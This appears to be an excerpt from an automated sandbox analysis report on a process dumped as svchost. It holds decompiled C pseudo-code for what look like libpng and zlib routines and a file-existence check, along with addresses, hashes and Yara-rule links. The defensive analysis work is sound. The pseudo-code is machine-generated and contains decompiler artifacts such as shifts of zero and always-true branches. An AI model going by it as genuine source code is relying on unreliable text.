										_t350 =  *(_t685 + 0x7c) & 0x0000007f;
										L117:
										 *(_t685 + 0x7c) = _t350;
										goto L118;
									}
									_t459 = _t457 + 2;
									do {
										_t563 =  *( *((intOrPtr*)(_t685 + 0x1b4)) + _t668);
										if(_t563 != 0) {
											__eflags = _t563 - 0xff;
											if(_t563 != 0xff) {
												_t564 = _t563 & 0x000000ff;
												_t123 = ( *(_t459 - 2) & 0x000000ff) * _t564 + 0x80; // 0x17f
												 *(_t459 - 2) = (((0x000000ff - _t564) * ( *(_t716 + 0x20) & 0x000000ff) + _t123 & 0x0000ffff) >> 8) + ((0x000000ff - _t564) * ( *(_t716 + 0x20) & 0x000000ff) + _t123 & 0x0000ffff) >> 8;
												_t568 =  *( *((intOrPtr*)(_t685 + 0x1b4)) + _t668) & 0x000000ff;
												_t130 = ( *(_t459 - 1) & 0x000000ff) * _t568 + 0x80; // 0x17f
												 *(_t459 - 1) = (((0x000000ff - _t568) * ( *(_t716 + 0x21) & 0x000000ff) + _t130 & 0x0000ffff) >> 8) + ((0x000000ff - _t568) * ( *(_t716 + 0x21) & 0x000000ff) + _t130 & 0x0000ffff) >> 8;
												_t572 =  *( *((intOrPtr*)(_t685 + 0x1b4)) + _t668) & 0x000000ff;
												_t135 = ( *_t459 & 0x000000ff) * _t572 + 0x80; // 0x17f
												_t704 =  *((intOrPtr*)(_t716 + 0x14));
												_t526 = (((0x000000ff - _t572) * (_t648 & 0x000000ff) + _t135 & 0x0000ffff) >> 8) + ((0x000000ff - _t572) * (_t648 & 0x000000ff) + _t135 & 0x0000ffff);
												__eflags = _t526;
												 *_t459 = _t526 >> 8;
											}
										} else {
											 *(_t459 - 2) =  *(_t716 + 0x20);
											(_t459 - 2)[2] = _t648;
										}
										_t668 = _t668 + 1;
										_t459 =  &(_t459[3]);
									} while (_t668 < _t704);
									goto L58;
								}
							}
							_t460 = E00441800( *(_t685 + 0x18c));
							_t716 = _t716 + 4;
							if(_t460 != 0) {
								goto L59;
							}
							goto L49;
						}
						_t461 = E00441800( *(_t685 + 0x2dc));
						_t716 = _t716 + 4;
						if(_t461 != 0) {
							goto L59;
						}
						_t463 = E00441800( *(_t685 + 0x18c));
						_t716 = _t716 + 4;
						if(_t463 != 0) {
							goto L59;
						}
						if( *((char*)(_t685 + 0x162)) != 3) {
							goto L47;
						}
						_t464 = E00441800( *((intOrPtr*)(_t685 + 0x164)));
						_t716 = _t716 + 4;
						if(_t464 != 0) {
							goto L59;
						}
						goto L47;
					}
					_t466 = E00441800( *(_t685 + 0x2dc));
					_t716 = _t716 + 4;
					if(_t466 != 0) {
						goto L59;
					}
					_t467 = E00441800( *(_t685 + 0x18c));
					_t716 = _t716 + 4;
					if(_t467 != 0) {
						goto L59;
					}
					goto L42;
				}
			}






















































































    0x0044eed0
    0x0044eedb
    0x0044eee0
    0x0044eee2
    0x0044eeea
    0x0044ef15
    0x0044ef1b
    0x0044ef1d
    0x0044ef30
    0x0044ef36
    0x0044ef1f
    0x0044ef1f
    0x0044ef20
    0x0044ef25
    0x0044ef28
    0x0044ef28
    0x0044eeec
    0x0044eeec
    0x0044eef2
    0x0044eef4
    0x0044ef04
    0x0044ef05
    0x0044ef0a
    0x0044ef0d
    0x0044eef6
    0x0044eef8
    0x0044eefd
    0x0044ef00
    0x0044ef00
    0x0044eef4
    0x0044ef3c
    0x0044ef43
    0x0044ef4d
    0x0044ef54
    0x0044ef54
    0x0044ef4f
    0x0044ef4f
    0x0044ef4f
    0x0044ef5b
    0x0044ef60
    0x0044ef6b
    0x0044ef74
    0x0044ef7c
    0x0044ef7c
    0x0044ef86
    0x0044ef8b
    0x0044ef90
    0x0044efa0
    0x0044efa3
    0x0044efa3
    0x0044efad
    0x0044efb0
    0x0044efb5
    0x0044efb5
    0x0044efb8
    0x0044efbe
    0x0044efd4
    0x0044efd6
    0x0044efd8
    0x0044efdb
    0x0044efdd
    0x0044efe4
    0x0044efeb
    0x0044efed
    0x0044eff4
    0x0044eff9
    0x0044f000
    0x0044f000
    0x0044f003
    0x0044f003
    0x0044eff4
    0x0044efeb
    0x0044efdb
    0x0044efc0
    0x0044efc7
    0x0044efcf
    0x0044efcf
    0x0044efc7
    0x0044f00c
    0x0044f00f
    0x0044f018
    0x0044f011
    0x0044f011
    0x0044f011
    0x0044f01d
    0x0044f020
    0x0044f028
    0x0044f06d
    0x0044f08c
    0x0044f0ab
    0x0044f0bc
    0x0044f0bc
    0x0044f0c9
    0x0044f0f4
    0x0044f102
    0x0044f11a
    0x0044f121
    0x0044f121
    0x0044f128
    0x0044f12e
    0x0044f139
    0x0044f13e
    0x0044f145
    0x0044f149
    0x0044f338
    0x0044f342
    0x0044f347
    0x0044f34a
    0x0044f34d
    0x0044f34f
    0x0044f8a2
    0x0044f8a9
    0x00000000
    0x00000000
    0x0044f8ab
    0x0044f8ae
    0x0044f8b7
    0x0044f8b7
    0x0044f8bf
    0x0044f8c6
    0x0044f8c8
    0x0044f906
    0x0044f909
    0x0044f909
    0x00000000
    0x0044f909
    0x0044f8ca
    0x0044f8ca
    0x0044f8cd
    0x0044f8d8
    0x0044f8de
    0x0044f8ef
    0x0044f8fa
    0x0044f8fa
    0x0044f901
    0x0044f901
    0x00000000
    0x0044f8cd
    0x0044f8b0
    0x0044f8b5
    0x00000000
    0x00000000
    0x00000000
    0x0044f8b5
    0x0044f355
    0x0044f35a
    0x0044f362
    0x0044f367
    0x0044f367
    0x0044f36a
    0x0044f371
    0x0044f6c6
    0x0044f6d1
    0x0044f6d3
    0x0044f6d4
    0x0044f73c
    0x0044f6d6
    0x0044f6d6
    0x0044f6d7
    0x0044f71a
    0x0044f71b
    0x0044f72c
    0x0044f72d
    0x0044f72e
    0x0044f730
    0x0044f735
    0x0044f738
    0x0044f6d9
    0x0044f6d9
    0x0044f6da
    0x0044f6f2
    0x0044f6f3
    0x0044f704
    0x0044f705
    0x0044f706
    0x0044f708
    0x0044f70d
    0x0044f710
    0x0044f6dc
    0x0044f6e2
    0x0044f6e7
    0x0044f6e7
    0x0044f6da
    0x0044f6d7
    0x0044f749
    0x0044f74b
    0x0044f750
    0x0044f753
    0x0044f757
    0x0044f759
    0x0044f75b
    0x0044f767
    0x0044f76c
    0x0044f76f
    0x0044f76f
    0x0044f77a
    0x0044f77c
    0x0044f77e
    0x0044f78a
    0x0044f78f
    0x0044f792
    0x0044f792
    0x0044f799
    0x0044f7a0
    0x0044f7a7
    0x0044f7fb
    0x0044f7fb
    0x0044f7fd
    0x0044f816
    0x0044f824
    0x0044f82b
    0x0044f837
    0x0044f83c
    0x0044f83f
    0x0044f83f
    0x0044f84a
    0x0044f84c
    0x0044f869
    0x0044f877
    0x0044f87e
    0x0044f892
    0x0044f892
    0x0044f899
    0x0044f7a9
    0x0044f7a9
    0x0044f7b0
    0x00000000
    0x00000000
    0x0044f7b2
    0x0044f7b9
    0x0044f7bc
    0x00000000
    0x00000000
    0x0044f7be
    0x0044f7c5
    0x0044f7cc
    0x0044f7d3
    0x0044f7da
    0x0044f7e1
    0x0044f7e8
    0x0044f7ef
    0x0044f7ef
    0x00000000
    0x0044f377
    0x0044f37d
    0x0044f38a
    0x0044f394
    0x0044f396
    0x0044f3ef
    0x0044f3f0
    0x0044f44f
    0x0044f455
    0x0044f455
    0x0044f45a
    0x0044f45b
    0x0044f460
    0x0044f463
    0x0044f465
    0x0044f4ba
    0x0044f4be
    0x0044f4c2
    0x0044f467
    0x0044f469
    0x0044f477
    0x0044f484
    0x0044f486
    0x0044f48d
    0x0044f495
    0x0044f49a
    0x0044f49f
    0x0044f4a2
    0x0044f4a2
    0x0044f4c7
    0x0044f4cc
    0x0044f4cf
    0x0044f4d1
    0x0044f51a
    0x0044f520
    0x0044f4d3
    0x0044f4d5
    0x0044f4de
    0x0044f4ee
    0x0044f4f0
    0x0044f4f7
    0x0044f4ff
    0x0044f504
    0x0044f509
    0x0044f509
    0x0044f524
    0x0044f528
    0x0044f52c
    0x0044f52e
    0x0044f530
    0x0044f6b7
    0x0044f6ba
    0x00000000
    0x0044f6ba
    0x0044f53a
    0x0044f53a
    0x0044f53d
    0x0044f546
    0x0044f548
    0x0044f676
    0x0044f686
    0x0044f695
    0x0044f697
    0x0044f6a5
    0x00000000
    0x0044f6a5
    0x0044f554
    0x0044f557
    0x0044f55a
    0x00000000
    0x00000000
    0x0044f560
    0x0044f562
    0x0044f5c7
    0x0044f61d
    0x0044f672
    0x0044f564
    0x0044f56c
    0x0044f574
    0x0044f574
    0x0044f6a7
    0x0044f6ab
    0x0044f6ac
    0x0044f6af
    0x0044f6af
    0x00000000
    0x0044f53d
    0x0044f3f2
    0x0044f3f3
    0x0044f42d
    0x0044f439
    0x0044f441
    0x0044f442
    0x0044f443
    0x0044f448
    0x0044f44b
    0x00000000
    0x0044f44b
    0x0044f3f5
    0x0044f3f6
    0x0044f405
    0x0044f411
    0x0044f419
    0x0044f41a
    0x0044f41b
    0x0044f420
    0x0044f423
    0x00000000
    0x0044f423
    0x0044f3f8
    0x00000000
    0x0044f3f8
    0x0044f398
    0x0044f3aa
    0x0044f3c3
    0x0044f3ca
    0x0044f3ce
    0x0044f3dd
    0x0044f3e1
    0x00000000
    0x0044f3e1
    0x0044f14f
    0x0044f155
    0x0044f185
    0x0044f188
    0x0044f1d8
    0x0044f1df
    0x0044f1f8
    0x0044f1fb
    0x0044f90e
    0x0044f90e
    0x0044f913
    0x0044f9e1
    0x0044f9e1
    0x0044f92f
    0x0044f93e
    0x0044f947
    0x0044f94b
    0x0044f94e
    0x0044f970
    0x0044f981
    0x0044f9a6
    0x0044f9b7
    0x0044f9c2
    0x0044f9c4
    0x0044f9c4
    0x0044f9cc
    0x0044f9d0
    0x0044f9d0
    0x0044f9d4
    0x0044f9d7
    0x0044f9d7
    0x0044f9c4
    0x00000000
    0x0044f98c
    0x0044f98c
    0x0044f98e
    0x0044f990
    0x0044f990
    0x0044f998
    0x0044f99c
    0x0044f99c
    0x0044f9a0
    0x0044f9a3
    0x0044f9a3
    0x00000000
    0x0044f990
    0x0044f959
    0x0044f959
    0x0044f95b
    0x0044f95d
    0x0044f95d
    0x0044f965
    0x0044f968
    0x0044f96a
    0x0044f96d
    0x0044f96d
    0x00000000
    0x0044f95d
    0x0044f94e
    0x0044f20e
    0x0044f21a
    0x0044f222
    0x0044f229
    0x0044f22b
    0x0044f22f
    0x0044f237
    0x0044f23b
    0x0044f23f
    0x0044f32e
    0x0044f331
    0x0044f90b
    0x0044f90b
    0x00000000
    0x0044f90b
    0x0044f245
    0x0044f248
    0x0044f24e
    0x0044f253
    0x0044f269
    0x0044f26c
    0x0044f278
    0x0044f28e
    0x0044f2ab
    0x0044f2b9
    0x0044f2cb
    0x0044f2e2
    0x0044f2f0
    0x0044f305
    0x0044f30c
    0x0044f31b
    0x0044f31b
    0x0044f320
    0x0044f320
    0x0044f255
    0x0044f25d
    0x0044f261
    0x0044f261
    0x0044f322
    0x0044f323
    0x0044f326
    0x00000000
    0x0044f248
    0x0044f1fb
    0x0044f1e8
    0x0044f1ed
    0x0044f1f2
    0x00000000
    0x00000000
    0x00000000
    0x0044f1f2
    0x0044f191
    0x0044f196
    0x0044f19b
    0x00000000
    0x00000000
    0x0044f1a8
    0x0044f1ad
    0x0044f1b2
    0x00000000
    0x00000000
    0x0044f1bf
    0x00000000
    0x00000000
    0x0044f1c8
    0x0044f1cd
    0x0044f1d2
    0x00000000
    0x00000000
    0x00000000
    0x0044f1d2
    0x0044f15e
    0x0044f163
    0x0044f168
    0x00000000
    0x00000000
    0x0044f175
    0x0044f17a
    0x0044f17f
    0x00000000
    0x00000000
    0x00000000
    0x0044f17f

    Strings
    • invalid background gamma type, xrefs: 0044F6DC
    • libpng does not support gamma+background+rgb_to_gray, xrefs: 0044F35C
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID: invalid background gamma type$libpng does not support gamma+background+rgb_to_gray
    • API String ID: 0-3995106164
    • Opcode ID: 16400ee2568a597f2f674fd193b3581df06bc4193968c6dd15c75c90c8020480
    • Instruction ID: d3eb3f5b50e70e07c0cd6cd74311739468c4a7ad6554e2fcd37aeb85d1dd5655
    • Opcode Fuzzy Hash: 16400ee2568a597f2f674fd193b3581df06bc4193968c6dd15c75c90c8020480
    • Instruction Fuzzy Hash: BE623975508B824AE331DB35C8417F7FBE1AF9A304F08493ED8EA87352E639A449C759
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0041EED0 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0041EED0(CHAR* _a4) {
				void* _t3;
				struct _WIN32_FIND_DATAA* _t8;

				_t3 = FindFirstFileA(_a4, _t8);
				if(_t3 == 0xffffffff) {
					return 0;
				} else {
					FindClose(_t3);
					return 1;
				}
			}





    0x0041eee0
    0x0041eee9
    0x0041ef06
    0x0041eeeb
    0x0041eeec
    0x0041eefd
    0x0041eefd

    APIs
    • FindFirstFileA.KERNEL32(?,?), ref: 0041EEE0
    • FindClose.KERNEL32(00000000), ref: 0041EEEC
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Find$CloseFileFirst
    • String ID:
    • API String ID: 2295610775-0
    • Opcode ID: d1ad6c1bbd110ba421fe9f2defa250fd2001864ccff6aa6cdad026061469ae5a
    • Instruction ID: bac2b9e4e48bf69d3342e3353a6fefdc38e0cb298efe00baf2fd2b4b41590976
    • Opcode Fuzzy Hash: d1ad6c1bbd110ba421fe9f2defa250fd2001864ccff6aa6cdad026061469ae5a
    • Instruction Fuzzy Hash: 97D0A7744002017BD3219B75DD086FB3358BB44320FC40A35BD2CC12F0F67EC8588511
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00468080 Relevance: 2.8, Strings: 2, Instructions: 334COMMONCrypto
    Download Yara Rule
    C-Code - Quality: 89%
    			E00468080() {
				unsigned int _t147;
				unsigned int _t152;
				intOrPtr _t161;
				signed char _t163;
				intOrPtr _t164;
				signed int _t165;
				signed char _t167;
				signed int _t168;
				signed int _t171;
				intOrPtr _t177;
				intOrPtr _t180;
				signed int _t183;
				signed int _t191;
				signed int _t199;
				signed int _t216;
				char* _t223;
				void* _t224;
				signed char _t227;
				signed int _t229;
				signed int _t236;
				signed int _t246;
				signed int _t253;
				unsigned int _t256;
				unsigned int _t259;
				intOrPtr* _t264;
				void* _t267;
				void* _t268;
				signed int _t270;
				intOrPtr _t277;
				intOrPtr _t278;
				void* _t279;
				char* _t280;
				signed int _t283;
				intOrPtr _t284;
				signed int _t286;
				intOrPtr _t287;
				void* _t288;
				intOrPtr _t291;
				intOrPtr* _t296;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t302;
				intOrPtr _t303;
				signed int _t305;
				signed int _t308;
				intOrPtr _t309;
				intOrPtr _t312;
				intOrPtr _t313;
				intOrPtr _t314;
				intOrPtr _t315;
				void* _t316;

				_t183 =  *(_t316 + 0x28);
				_t161 =  *((intOrPtr*)(_t183 + 0x34));
				_t277 =  *((intOrPtr*)(_t183 + 0x30));
				_t256 =  *(_t183 + 0x20);
				_t264 =  *((intOrPtr*)(_t316 + 0x3c));
				 *((intOrPtr*)(_t316 + 0x14)) = _t161;
				_t312 =  *_t264;
				 *((intOrPtr*)(_t316 + 0x10)) =  *((intOrPtr*)(_t264 + 4));
				_t147 =  *(_t183 + 0x1c);
				if(_t161 >= _t277) {
					 *((intOrPtr*)(_t316 + 0x18)) =  *((intOrPtr*)(_t183 + 0x2c)) - _t161;
				} else {
					 *((intOrPtr*)(_t316 + 0x18)) = _t277 - _t161 - 1;
				}
				 *(_t316 + 0x1c) =  *(0x4b83a0 +  *(_t316 + 0x28) * 4);
				 *(_t316 + 0x20) =  *(0x4b83a0 +  *(_t316 + 0x2c) * 4);
				L4:
				while(1) {
					while(_t147 < 0x14) {
						 *((intOrPtr*)(_t316 + 0x10)) =  *((intOrPtr*)(_t316 + 0x10)) - 1;
						_t286 = 0 << _t147;
						_t147 = _t147 + 8;
						_t256 = _t256 | _t286;
						_t312 = _t312 + 1;
					}
					_t278 =  *((intOrPtr*)(_t316 + 0x30));
					_t191 =  *(_t316 + 0x1c) & _t256;
					_t163 =  *((intOrPtr*)(_t278 + _t191 * 8));
					_t279 = _t278 + _t191 * 8;
					if(0 == 0) {
						L26:
						_t256 = _t256 >>  *(_t279 + 1);
						_t147 = _t147;
						_t280 =  *((intOrPtr*)(_t316 + 0x14));
						 *_t280 =  *((intOrPtr*)(_t279 + 4));
						 *((intOrPtr*)(_t316 + 0x14)) = _t280 + 1;
						 *((intOrPtr*)(_t316 + 0x18)) =  *((intOrPtr*)(_t316 + 0x18)) - 1;
						goto L27;
					} else {
						_t256 = _t256 >>  *(_t279 + 1);
						_t147 = _t147;
						 *(_t316 + 0x2c) = 0;
						if((_t163 & 0x00000010) != 0) {
							L11:
							_t165 = _t163 & 0x0000000f;
							_t152 = _t147 - _t165;
							 *(_t316 + 0x28) = ( *(0x4b83a0 + _t165 * 4) & _t256) +  *((intOrPtr*)(_t279 + 4));
							_t259 = _t256 >> _t165;
							while(_t152 < 0xf) {
								 *((intOrPtr*)(_t316 + 0x10)) =  *((intOrPtr*)(_t316 + 0x10)) - 1;
								_t305 = 0 << _t152;
								_t152 = _t152 + 8;
								_t259 = _t259 | _t305;
								_t312 = _t312 + 1;
							}
							_t287 =  *((intOrPtr*)(_t316 + 0x34));
							_t216 =  *(_t316 + 0x20) & _t259;
							_t167 =  *((intOrPtr*)(_t287 + _t216 * 8));
							_t288 = _t287 + _t216 * 8;
							_t256 = _t259 >>  *(_t288 + 1);
							_t147 = _t152;
							 *(_t316 + 0x2c) = 0;
							if((_t167 & 0x00000010) != 0) {
								L16:
								_t168 = _t167 & 0x0000000f;
								while(_t147 < _t168) {
									 *((intOrPtr*)(_t316 + 0x10)) =  *((intOrPtr*)(_t316 + 0x10)) - 1;
									_t227 = _t147;
									_t147 = _t147 + 8;
									_t256 = _t256 | 0 << _t227;
									_t312 = _t312 + 1;
								}
								_t267 = ( *(0x4b83a0 + _t168 * 4) & _t256) +  *((intOrPtr*)(_t288 + 4));
								_t256 = _t256 >> _t168;
								_t147 = _t147 - _t168;
								 *((intOrPtr*)(_t316 + 0x18)) =  *((intOrPtr*)(_t316 + 0x18)) -  *(_t316 + 0x28);
								_t291 =  *((intOrPtr*)( *((intOrPtr*)(_t316 + 0x38)) + 0x28));
								_t223 =  *((intOrPtr*)(_t316 + 0x14));
								if(_t223 - _t291 < _t267) {
									_t171 =  *(_t316 + 0x28);
									_t268 = _t291 - _t223 + _t267;
									_t296 =  *((intOrPtr*)( *((intOrPtr*)(_t316 + 0x38)) + 0x2c)) - _t268;
									if(_t171 > _t268) {
										 *(_t316 + 0x28) = _t171 - _t268;
										do {
											 *_t223 =  *_t296;
											_t223 = _t223 + 1;
											_t296 = _t296 + 1;
											_t268 = _t268 - 1;
										} while (_t268 != 0);
										_t296 =  *((intOrPtr*)( *((intOrPtr*)(_t316 + 0x38)) + 0x28));
									}
								} else {
									_t299 = _t223 - _t267;
									_t224 = _t223 + 1;
									_t300 = _t299 + 1;
									 *((char*)(_t224 - 1)) =  *_t299;
									_t223 = _t224 + 1;
									_t296 = _t300 + 1;
									 *((char*)(_t223 - 1)) =  *_t300;
									 *(_t316 + 0x28) =  *(_t316 + 0x28) - 2;
									do {
										goto L24;
									} while (_t270 != 0);
									_t264 =  *((intOrPtr*)(_t316 + 0x3c));
									 *((intOrPtr*)(_t316 + 0x14)) = _t223;
									L27:
									_t164 =  *((intOrPtr*)(_t316 + 0x10));
									if( *((intOrPtr*)(_t316 + 0x18)) < 0x102 || _t164 < 0xa) {
										_t199 =  *((intOrPtr*)(_t264 + 4)) - _t164;
										_t283 = _t147 >> 3;
										if(_t283 < _t199) {
											_t199 = _t283;
										}
										_t284 =  *((intOrPtr*)(_t316 + 0x38));
										_t313 = _t312 - _t199;
										 *(_t284 + 0x20) = _t256;
										 *((intOrPtr*)(_t284 + 0x1c)) = _t147 - _t199 * 8;
										 *((intOrPtr*)(_t264 + 4)) = _t199 + _t164;
										 *_t264 = _t313;
										 *((intOrPtr*)(_t264 + 8)) =  *((intOrPtr*)(_t264 + 8)) + _t313 -  *_t264;
										 *((intOrPtr*)(_t284 + 0x34)) =  *((intOrPtr*)(_t316 + 0x14));
										return 0;
									} else {
										continue;
									}
									goto L42;
								}
								L24:
								 *_t223 =  *_t296;
								_t223 = _t223 + 1;
								_t296 = _t296 + 1;
								_t270 =  *(_t316 + 0x28) - 1;
								 *(_t316 + 0x28) = _t270;
							} else {
								while((_t167 & 0x00000040) == 0) {
									_t236 = ( *(0x4b83a0 + _t167 * 4) & _t256) +  *((intOrPtr*)(_t288 + 4));
									_t167 =  *((intOrPtr*)(_t288 + _t236 * 8));
									_t288 = _t288 + _t236 * 8;
									_t256 = _t256 >>  *(_t288 + 1);
									_t147 = _t147;
									 *(_t316 + 0x2c) = 0;
									if((_t167 & 0x00000010) == 0) {
										continue;
									} else {
										goto L16;
									}
									goto L42;
								}
								_t177 =  *((intOrPtr*)(_t316 + 0x10));
								_t229 =  *((intOrPtr*)(_t264 + 4)) - _t177;
								_t302 = _t147 >> 3;
								 *(_t264 + 0x18) = "invalid distance code";
								if(_t302 < _t229) {
									goto L40;
								}
								goto L41;
							}
						} else {
							while((_t163 & 0x00000040) == 0) {
								_t253 = ( *(0x4b83a0 + _t163 * 4) & _t256) +  *((intOrPtr*)(_t279 + 4));
								_t163 =  *((intOrPtr*)(_t279 + _t253 * 8));
								_t279 = _t279 + _t253 * 8;
								if(0 == 0) {
									goto L26;
								} else {
									_t256 = _t256 >>  *(_t279 + 1);
									_t147 = _t147;
									 *(_t316 + 0x2c) = 0;
									if((_t163 & 0x00000010) == 0) {
										continue;
									} else {
										goto L11;
									}
								}
								goto L42;
							}
							if((_t163 & 0x00000020) == 0) {
								_t177 =  *((intOrPtr*)(_t316 + 0x10));
								_t229 =  *((intOrPtr*)(_t264 + 4)) - _t177;
								_t302 = _t147 >> 3;
								 *(_t264 + 0x18) = "invalid literal/length code";
								if(_t302 < _t229) {
									L40:
									_t229 = _t302;
								}
								L41:
								_t303 =  *((intOrPtr*)(_t316 + 0x38));
								_t314 = _t312 - _t229;
								 *(_t303 + 0x20) = _t256;
								 *((intOrPtr*)(_t303 + 0x1c)) = _t147 - _t229 * 8;
								 *((intOrPtr*)(_t264 + 4)) = _t229 + _t177;
								 *_t264 = _t314;
								 *((intOrPtr*)(_t264 + 8)) =  *((intOrPtr*)(_t264 + 8)) + _t314 -  *_t264;
								 *((intOrPtr*)(_t303 + 0x34)) =  *((intOrPtr*)(_t316 + 0x14));
								return 0xfffffffd;
							} else {
								_t180 =  *((intOrPtr*)(_t316 + 0x10));
								_t246 =  *((intOrPtr*)(_t264 + 4)) - _t180;
								_t308 = _t147 >> 3;
								if(_t308 < _t246) {
									_t246 = _t308;
								}
								_t309 =  *((intOrPtr*)(_t316 + 0x38));
								_t315 = _t312 - _t246;
								 *(_t309 + 0x20) = _t256;
								 *((intOrPtr*)(_t309 + 0x1c)) = _t147 - _t246 * 8;
								 *((intOrPtr*)(_t264 + 4)) = _t246 + _t180;
								 *_t264 = _t315;
								 *((intOrPtr*)(_t264 + 8)) =  *((intOrPtr*)(_t264 + 8)) + _t315 -  *_t264;
								 *((intOrPtr*)(_t309 + 0x34)) =  *((intOrPtr*)(_t316 + 0x14));
								return 1;
							}
						}
					}
					L42:
				}
			}






















































    0x00468083
    0x0046808a
    0x0046808d
    0x00468090
    0x00468094
    0x0046809a
    0x004680a1
    0x004680a3
    0x004680a7
    0x004680aa
    0x004680ba
    0x004680ac
    0x004680af
    0x004680af
    0x004680c9
    0x004680d8
    0x00000000
    0x004680dc
    0x004680df
    0x004680e6
    0x004680f3
    0x004680f5
    0x004680f8
    0x004680fa
    0x004680fb
    0x00468104
    0x00468108
    0x0046810c
    0x0046810f
    0x00468114
    0x004682b8
    0x004682bd
    0x004682bf
    0x004682c4
    0x004682c8
    0x004682d0
    0x004682d4
    0x00000000
    0x0046811a
    0x0046811f
    0x00468121
    0x00468123
    0x0046812a
    0x00468165
    0x00468165
    0x00468168
    0x00468176
    0x0046817c
    0x00468181
    0x00468188
    0x00468195
    0x00468197
    0x0046819a
    0x0046819c
    0x0046819d
    0x004681a6
    0x004681aa
    0x004681ae
    0x004681b1
    0x004681b9
    0x004681bb
    0x004681bd
    0x004681c4
    0x004681f7
    0x004681f7
    0x004681fc
    0x00468208
    0x0046820e
    0x00468210
    0x00468215
    0x00468217
    0x00468218
    0x0046822c
    0x00468230
    0x00468236
    0x0046823e
    0x00468242
    0x00468245
    0x0046824f
    0x00468272
    0x00468278
    0x00468281
    0x00468285
    0x00468289
    0x0046828d
    0x0046828f
    0x00468291
    0x00468292
    0x00468293
    0x00468293
    0x0046829a
    0x0046829a
    0x00468251
    0x00468253
    0x00468259
    0x0046825c
    0x0046825d
    0x00468260
    0x00468263
    0x00468264
    0x0046826a
    0x0046829d
    0x00000000
    0x00000000
    0x004682ae
    0x004682b2
    0x004682d8
    0x004682dc
    0x004682e6
    0x00468319
    0x0046831b
    0x00468320
    0x00468322
    0x00468322
    0x00468324
    0x00468328
    0x0046832a
    0x00468338
    0x0046833f
    0x00468349
    0x0046834b
    0x00468352
    0x0046835e
    0x004682ed
    0x00000000
    0x004682ed
    0x00000000
    0x004682e6
    0x0046829d
    0x004682a3
    0x004682a5
    0x004682a6
    0x004682a7
    0x004682a8
    0x004681c6
    0x004681c6
    0x004681db
    0x004681df
    0x004681e2
    0x004681ea
    0x004681ec
    0x004681ee
    0x004681f5
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004681f5
    0x004682f5
    0x004682fb
    0x004682fd
    0x00468302
    0x00468309
    0x00000000
    0x0046830f
    0x00000000
    0x00468309
    0x0046812c
    0x0046812c
    0x00468141
    0x00468145
    0x00468148
    0x0046814d
    0x00000000
    0x00468153
    0x00468158
    0x0046815a
    0x0046815c
    0x00468163
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00468163
    0x00000000
    0x0046814d
    0x00468362
    0x004683b9
    0x004683bf
    0x004683c1
    0x004683c6
    0x004683cd
    0x004683cf
    0x004683cf
    0x004683cf
    0x004683d1
    0x004683d1
    0x004683d5
    0x004683d7
    0x004683e5
    0x004683ec
    0x004683f6
    0x004683f8
    0x004683ff
    0x0046840e
    0x00468364
    0x00468367
    0x0046836d
    0x0046836f
    0x00468374
    0x00468376
    0x00468376
    0x00468378
    0x0046837c
    0x0046837e
    0x0046838c
    0x00468393
    0x0046839d
    0x0046839f
    0x004683a6
    0x004683b5
    0x004683b5
    0x00468362
    0x0046812a
    0x00000000
    0x00468114

    Strings
    • invalid distance code, xrefs: 00468302
    • invalid literal/length code, xrefs: 004683C6
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
